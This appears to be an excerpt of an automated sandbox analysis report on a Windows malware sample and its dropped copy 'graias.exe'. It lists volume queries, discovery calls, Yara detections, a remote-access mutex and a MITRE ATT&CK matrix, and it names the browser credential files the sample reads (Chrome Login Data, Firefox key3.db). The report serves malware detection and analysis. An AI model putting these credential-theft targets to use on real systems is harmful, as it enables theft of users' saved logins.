                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\DUBAI-BOLD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat | VolumeInformation
Source: C:\Users\user\AppData\Roaming\Graias\graias.exe | Queries volume information: C:\Users\user\AppData\Roaming\Graias\graias.exe | VolumeInformation
Source: C:\Users\user\AppData\Roaming\Graias\graias.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll | VolumeInformation
Source: C:\Users\user\AppData\Roaming\Graias\graias.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll | VolumeInformation
Source: C:\Users\user\AppData\Roaming\Graias\graias.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll | VolumeInformation
Source: C:\Users\user\AppData\Roaming\Graias\graias.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat | VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeCode function: 3_2_00434020 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,3_2_00434020
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeCode function: 3_2_0041A7B2 GetUserNameW,3_2_0041A7B2
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeCode function: 3_2_00448067 _free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,3_2_00448067
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                Source: Amcache.hve.7.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                Source: Amcache.hve.7.drBinary or memory string: msmpeng.exe
                Source: Amcache.hve.7.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                Source: Amcache.hve.7.drBinary or memory string: MsMpEng.exe

Stealing of Sensitive Information

Source: Yara match | File source: 0.2.4XYAW8PbZH.exe.4425c30.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.4XYAW8PbZH.exe.4425c30.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.4XYAW8PbZH.exe.39e2d20.6.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.4XYAW8PbZH.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.4XYAW8PbZH.exe.39e2d20.6.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.4XYAW8PbZH.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1832995156.0000000004425000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1832995156.0000000003919000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: 4XYAW8PbZH.exe PID: 6976, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: 4XYAW8PbZH.exe PID: 2816, type: MEMORYSTR
Source: Yara match | File source: C:\ProgramData\graias\logs.dat, type: DROPPED
Source: C:\Users\user\Desktop\4XYAW8PbZH.exe | Code function: \AppData\Local\Google\Chrome\User Data\Default\Login Data (3_2_0040B21B)
Source: C:\Users\user\Desktop\4XYAW8PbZH.exe | Code function: \AppData\Roaming\Mozilla\Firefox\Profiles\ (3_2_0040B335)
Source: C:\Users\user\Desktop\4XYAW8PbZH.exe | Code function: \key3.db (3_2_0040B335)

Remote Access Functionality

Source: C:\Users\user\Desktop\4XYAW8PbZH.exe | Mutex created: \Sessions\1\BaseNamedObjects\Rmc-O844B9
Source: C:\Users\user\AppData\Roaming\Graias\graias.exe | Mutex created: \Sessions\1\BaseNamedObjects\Rmc-O844B9
Source: Yara match | File source: 0.2.4XYAW8PbZH.exe.4425c30.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.4XYAW8PbZH.exe.4425c30.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.4XYAW8PbZH.exe.39e2d20.6.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.4XYAW8PbZH.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.4XYAW8PbZH.exe.39e2d20.6.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.4XYAW8PbZH.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1832995156.0000000004425000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1832995156.0000000003919000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: 4XYAW8PbZH.exe PID: 6976, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: 4XYAW8PbZH.exe PID: 2816, type: MEMORYSTR
Source: Yara match | File source: C:\ProgramData\graias\logs.dat, type: DROPPED
Source: C:\Users\user\Desktop\4XYAW8PbZH.exe | Code function: cmd.exe (3_2_00405042)
MITRE ATT&CK Matrix

Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 21 Windows Management Instrumentation | 1 DLL Side-Loading | 1 DLL Side-Loading | 11 Disable or Modify Tools | 1 OS Credential Dumping | 2 System Time Discovery | Remote Services | 11 Archive Collected Data | 12 Ingress Tool Transfer | Exfiltration Over Other Network Medium | 1 System Shutdown/Reboot
Credentials | Domains | Default Accounts | 2 Native API | 1 Windows Service | 1 Bypass User Account Control | 1 Deobfuscate/Decode Files or Information | 211 Input Capture | 1 Account Discovery | Remote Desktop Protocol | 211 Input Capture | 21 Encrypted Channel | Exfiltration Over Bluetooth | 1 Defacement
Email Addresses | DNS Server | Domain Accounts | 1 Command and Scripting Interpreter | 11 Registry Run Keys / Startup Folder | 1 Access Token Manipulation | 3 Obfuscated Files or Information | 2 Credentials In Files | 1 System Service Discovery | SMB/Windows Admin Shares | 3 Clipboard Data | 1 Non-Standard Port | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | 2 Service Execution | Login Hook | 1 Windows Service | 12 Software Packing | NTDS | 4 File and Directory Discovery | Distributed Component Object Model | Input Capture | 1 Remote Access Software | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | 322 Process Injection | 1 DLL Side-Loading | LSA Secrets | 44 System Information Discovery | SSH | Keylogging | 2 Non-Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | 11 Registry Run Keys / Startup Folder | 1 Bypass User Account Control | Cached Domain Credentials | 161 Security Software Discovery | VNC | GUI Input Capture | 13 Application Layer Protocol | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 1 Masquerading | DCSync | 61 Virtualization/Sandbox Evasion | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
